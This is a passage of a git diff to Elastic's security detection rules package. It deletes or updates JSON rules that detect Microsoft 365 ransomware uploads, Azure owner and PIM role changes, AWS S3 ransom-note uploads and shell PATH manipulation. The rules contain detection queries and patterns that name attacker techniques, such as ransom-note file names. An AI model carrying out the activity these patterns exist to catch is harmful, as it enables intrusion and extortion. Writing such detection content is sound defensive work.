data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 4 - }, - "id": "6b341d03-1d63-41ac-841a-2009c86959ca_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_207.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_207.json deleted file mode 100644 index de808a405e8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", - "false_positives": [ - "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Potential ransomware activity", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Potential ransomware activity\n\nMicrosoft 365's cloud services can be exploited by adversaries to distribute ransomware by uploading infected files. This detection rule leverages Microsoft Cloud App Security to identify suspicious uploads, focusing on successful events flagged as potential ransomware activity. 
By monitoring specific event datasets and actions, it helps security analysts pinpoint and mitigate ransomware threats, aligning with MITRE ATT&CK's impact tactics.\n\n### Possible investigation steps\n\n- Review the event details in the Microsoft Cloud App Security console to confirm the specific files and user involved in the \"Potential ransomware activity\" alert.\n- Check the event.dataset field for o365.audit logs to gather additional context about the user's recent activities and any other related events.\n- Investigate the event.provider field to ensure the alert originated from the SecurityComplianceCenter, confirming the source of the detection.\n- Analyze the event.category field to verify that the activity is categorized as web, which may indicate the method of file upload.\n- Assess the user's recent activity history and permissions to determine if the upload was intentional or potentially malicious.\n- Contact the user to verify the legitimacy of the uploaded files and gather any additional context or explanations for the activity.\n- If the files are confirmed or suspected to be malicious, initiate a response plan to contain and remediate any potential ransomware threat, including isolating affected systems and notifying relevant stakeholders.\n\n### False positive analysis\n\n- Legitimate file uploads by trusted users may trigger alerts if the files are mistakenly flagged as ransomware. To manage this, create exceptions for specific users or groups who frequently upload large volumes of files.\n- Automated backup processes that upload encrypted files to the cloud can be misidentified as ransomware activity. Exclude these processes by identifying and whitelisting the associated service accounts or IP addresses.\n- Certain file types or extensions commonly used in business operations might be flagged. Review and adjust the detection rule to exclude these file types if they are consistently identified as false positives.\n- Collaborative tools that sync files across devices may cause multiple uploads that appear suspicious. 
Monitor and exclude these tools by recognizing their typical behavior patterns and adjusting the rule settings accordingly.\n- Regularly review and update the list of exceptions to ensure that only verified non-threatening activities are excluded, maintaining the balance between security and operational efficiency.\n\n### Response and remediation\n\n- Immediately isolate the affected user account to prevent further uploads and potential spread of ransomware within the cloud environment.\n- Quarantine the uploaded files flagged as potential ransomware to prevent access and further distribution.\n- Conduct a thorough scan of the affected user's devices and cloud storage for additional signs of ransomware or other malicious activity.\n- Notify the security operations team to initiate a deeper investigation into the source and scope of the ransomware activity, leveraging MITRE ATT&CK techniques for guidance.\n- Restore any affected files from secure backups, ensuring that the backups are clean and free from ransomware.\n- Review and update access controls and permissions for the affected user and related accounts to minimize the risk of future incidents.\n- Escalate the incident to senior security management and, if necessary, involve legal or compliance teams to assess any regulatory implications.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1486", - "name": "Data Encrypted for Impact", - "reference": "https://attack.mitre.org/techniques/T1486/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json index 537cdad2327..6394727c122 100644 --- a/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/74f45152-9aee-11ef-b0a5-f661ea17fbcd_3.json @@ -23,6 +23,13 @@ 
"references": [ "https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 21, "rule_id": "74f45152-9aee-11ef-b0a5-f661ea17fbcd", "severity": "low", diff --git a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_103.json b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_103.json deleted file mode 100644 index 028d91bb897..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_103.json +++ /dev/null @@ -1,74 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "User Added as Owner for Azure Application", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating User Added as Owner for Azure Application\n\nAzure applications often require specific permissions for functionality, managed by assigning user roles. An adversary might exploit this by adding themselves or a compromised account as an owner, gaining elevated privileges to alter configurations or access sensitive data. The detection rule monitors audit logs for successful operations where a user is added as an application owner, flagging potential unauthorized privilege escalations.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to confirm the operation by filtering for event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to application\" with a successful outcome.\n- Identify the user account that was added as an owner and the account that performed the operation to determine if they are legitimate or potentially compromised.\n- Check the history of activities associated with both the added owner and the account that performed the operation to identify any suspicious behavior or patterns.\n- Verify the application's current configuration and permissions to assess any changes made after the new owner was added.\n- Contact the legitimate owner or administrator of the Azure application to confirm whether the addition of the new owner was authorized.\n- Investigate any recent changes in the organization's user access policies or roles that might explain the addition of a new owner.\n\n### False positive analysis\n\n- Routine administrative actions: Regular maintenance or updates by IT staff may involve adding users as application owners. To manage this, create a list of authorized personnel and exclude their actions from triggering alerts.\n- Automated processes: Some applications may have automated scripts or services that add users as owners for operational purposes. 
Identify these processes and configure exceptions for their activities.\n- Organizational changes: During mergers or restructuring, there may be legitimate reasons for adding multiple users as application owners. Temporarily adjust the rule to accommodate these changes and review the audit logs manually.\n- Testing and development: In development environments, users may be added as owners for testing purposes. Exclude these environments from the rule or set up a separate monitoring policy with adjusted thresholds.\n\n### Response and remediation\n\n- Immediately revoke the added user's owner permissions from the Azure application to prevent further unauthorized access or configuration changes.\n- Conduct a thorough review of recent activity logs for the affected application to identify any unauthorized changes or data access that may have occurred since the user was added as an owner.\n- Reset credentials and enforce multi-factor authentication for the compromised or suspicious account to prevent further misuse.\n- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals broader compromise.\n- Implement additional monitoring on the affected application and related accounts to detect any further unauthorized access attempts or privilege escalations.\n- Review and update access control policies to ensure that only authorized personnel can modify application ownership, and consider implementing stricter approval processes for such changes.\n- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add owner to application\" and event.outcome:(Success or success)\n", - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "774f5e28-7b75-4a58-b94e-41bf060fdd86", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "774f5e28-7b75-4a58-b94e-41bf060fdd86_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json deleted file mode 100644 index abedf3c5a73..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Azure 
Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Privilege Identity Management Role Modified", - "note": "## Triage and analysis\n\n### Investigating Azure Privilege Identity Management Role Modified\n\nAzure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator.\n\nThis rule identifies the update of PIM role settings, which can indicate that an attacker has already gained enough access to modify role assignment settings.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user?\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity didn't follow your organization's change management policies, it should be reviewed by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Restore the PIM roles to the desired state.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update role setting in PIM\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-resource-roles-assign-roles", - "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "7882cebf-6cf1-4de3-9662-213aa13e8b80", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "7882cebf-6cf1-4de3-9662-213aa13e8b80_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json index 5b0c3f81fb4..86e5c3e74c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json +++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_6.json @@ -16,6 +16,12 @@ "references": [ "https://en.wikipedia.org/wiki/List_of_file_signatures" ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], "required_fields": [ { "ecs": true, diff --git a/packages/security_detection_engine/kibana/security_rule/7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4.json 
b/packages/security_detection_engine/kibana/security_rule/7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4.json deleted file mode 100644 index f14e1f3d3ca..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4.json +++ /dev/null @@ -1,57 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims.", - "false_positives": [ - "Administrators may legitimately access, delete, and replace objects in S3 buckets. Ensure that the sequence of events is not part of a legitimate operation before taking action." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential AWS S3 Bucket Ransomware Note Uploaded", - "note": "\n## Triage and analysis\n\n### Investigating Potential AWS S3 Bucket Ransomware Note Uploaded\n\nThis rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims.\n\n#### Possible Investigation Steps:\n\n- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who performed the action. Verify if this actor typically performs such actions and if they have the necessary permissions.\n- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand the specific details of the `PutObject` action. Look for any unusual parameters that could suggest unauthorized or malicious modifications.\n- **Analyze the Source of the Request**: Investigate the `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unexpected location might indicate compromised credentials or unauthorized access.\n- **Contextualize with Timestamp**: Use the `@timestamp` field to check when the ransom note was uploaded. Changes during non-business hours or outside regular maintenance windows might require further scrutiny.\n- **Inspect the Ransom Note**: Review the `aws.cloudtrail.request_parameters` for the `PutObject` action to identify the characteristics of the uploaded ransom note. Look for common ransomware file extensions such as `.txt`, `.note`, `.ransom`, or `.html`.\n- **Correlate with Other Activities**: Search for related CloudTrail events before and after this action to see if the same actor or IP address engaged in other potentially suspicious activities.\n- **Check for Object Deletion or Access**: Look for `DeleteObject`, `DeleteObjects`, or `GetObject` API calls to the same S3 bucket that may indicate the adversary accessing and destroying objects before placing the ransom note.\n\n### False Positive Analysis:\n\n- **Legitimate Administrative Actions**: Confirm if the `PutObject` action aligns with scheduled updates, maintenance activities, or legitimate administrative tasks documented in change management systems.\n- **Consistency Check**: Compare the action against historical data of similar activities performed by the user or within the organization. 
If the action is consistent with past legitimate activities, it might indicate a false alarm.\n- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the upload was successful and intended according to policy.\n\n### Response and Remediation:\n\n- **Immediate Review and Reversal if Necessary**: If the activity was unauthorized, remove the uploaded ransom notes from the S3 bucket and review the bucket's access logs for any suspicious activity.\n- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar `PutObject` actions, especially those involving sensitive data or unusual file extensions.\n- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning S3 bucket management and the risks of ransomware.\n- **Audit S3 Bucket Policies and Permissions**: Conduct a comprehensive audit of all S3 bucket policies and associated permissions to ensure they adhere to the principle of least privilege.\n- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences.\n\n### Additional Information:\n\nFor further guidance on managing S3 bucket security and protecting against ransomware, refer to the [AWS S3 documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html) and AWS best practices for security. Additionally, consult the following resources for specific details on S3 ransomware protection:\n- [ERMETIC REPORT - AWS S3 Ransomware Exposure in the Wild](https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf)\n- [AWS S3 Ransomware Batch Deletion](https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/)\n- [S3 Ransomware Part 1: Attack Vector](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)\n", - "query": "from logs-aws.cloudtrail-*\n\n// any successful uploads via S3 API requests\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"s3.amazonaws.com\"\n and event.action == \"PutObject\"\n and event.outcome == \"success\"\n\n// abstract object name from API request parameters\n| dissect aws.cloudtrail.request_parameters \"%{?ignore_values}key=%{object_name}}\"\n\n// regex on common ransomware note extensions\n| where object_name rlike \"(.*)(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue)(.*)\"\n and not object_name rlike \"(.*)(AWSLogs|CloudTrail|access-logs)(.*)\"\n\n// keep relevant fields\n| keep tls.client.server_name, aws.cloudtrail.user_identity.arn, object_name\n\n// aggregate by S3 bucket, resource and object name\n| stats note_upload_count = count(*) by tls.client.server_name, aws.cloudtrail.user_identity.arn, object_name\n\n// filter for single occurrence to eliminate common upload operations\n| where note_upload_count == 1\n", - "references": [ - "https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf", - "https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/", - "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" - ], - "risk_score": 47, - "rule_id": "7fda9bb2-fd28-11ee-85f9-f661ea17fbce", - "setup": "AWS S3 data types need to be enabled 
in the CloudTrail trail configuration.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 4 - }, - "id": "7fda9bb2-fd28-11ee-85f9-f661ea17fbce_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/82f842c2-7c36-438c-b562-5afe54ab11f4_2.json b/packages/security_detection_engine/kibana/security_rule/82f842c2-7c36-438c-b562-5afe54ab11f4_2.json deleted file mode 100644 index 2237f7f9875..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/82f842c2-7c36-438c-b562-5afe54ab11f4_2.json +++ /dev/null @@ -1,124 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious Path Invocation from Command Line", - "new_terms_fields": [ - "process.parent.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Path Invocation from Command Line\n\nIn Linux environments, shell processes like bash or zsh execute commands, often using the PATH variable to locate executables. Adversaries may manipulate PATH to run malicious scripts from non-standard directories, evading detection. The detection rule identifies unusual PATH assignments in command lines, signaling potential unauthorized actions by monitoring specific shell invocations and command patterns.\n\n### Possible investigation steps\n\n- Review the command line details captured in the alert to identify the specific PATH assignment and the command being executed. This can provide insight into whether the command is expected or potentially malicious.\n- Check the process tree to understand the parent process and any child processes spawned by the suspicious shell invocation. This can help determine the context in which the command was executed.\n- Investigate the user account associated with the process to determine if the activity aligns with the user's typical behavior or if the account may have been compromised.\n- Examine the directory from which the command is being executed to verify if it is a non-standard or suspicious location. 
Look for any unusual files or scripts in that directory.\n- Cross-reference the event with other security logs or alerts to identify any correlated activities that might indicate a broader attack or compromise.\n- Assess the system's recent changes or updates to determine if they could have inadvertently caused the PATH modification or if it was intentionally altered by an adversary.\n\n### False positive analysis\n\n- System administrators or developers may intentionally modify the PATH variable for legitimate purposes, such as testing scripts or applications in development environments. To handle this, create exceptions for known users or specific directories commonly used for development.\n- Automated scripts or configuration management tools might alter the PATH variable as part of their normal operation. Identify these scripts and exclude their execution paths or user accounts from triggering alerts.\n- Some software installations or updates may temporarily change the PATH variable to include non-standard directories. Monitor installation processes and whitelist these activities when performed by trusted sources.\n- Custom shell configurations or user profiles might include PATH modifications for convenience or performance reasons. Review and document these configurations, and exclude them from detection if they are verified as non-threatening.\n- Educational or training environments where users experiment with shell commands may frequently trigger this rule. Consider excluding specific user groups or environments dedicated to learning and experimentation.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent potential lateral movement or data exfiltration.\n- Terminate any suspicious processes identified by the alert to stop any ongoing unauthorized actions.\n- Review the command history and PATH variable changes on the affected system to identify any unauthorized modifications or scripts executed from non-standard directories.\n- Restore the PATH variable to its default state to ensure that only trusted directories are used for command execution.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any malicious scripts or files.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n- Implement monitoring for similar PATH manipulation attempts across the network to enhance detection and prevent recurrence.", - "query": "event.category:process and host.os.type:linux and event.type:start and event.action:exec and\nprocess.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and process.args:-c and\nprocess.command_line:(*PATH=* and not sh*/run/motd.dynamic.new)\n", - "references": [ - "https://blog.exatrack.com/Perfctl-using-portainer-and-new-persistences/" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.name", - "type": 
"keyword" - } - ], - "risk_score": 21, - "rule_id": "82f842c2-7c36-438c-b562-5afe54ab11f4", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - 